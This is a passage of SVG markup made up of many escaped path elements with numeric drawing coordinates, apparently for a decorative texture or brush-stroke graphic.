d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path 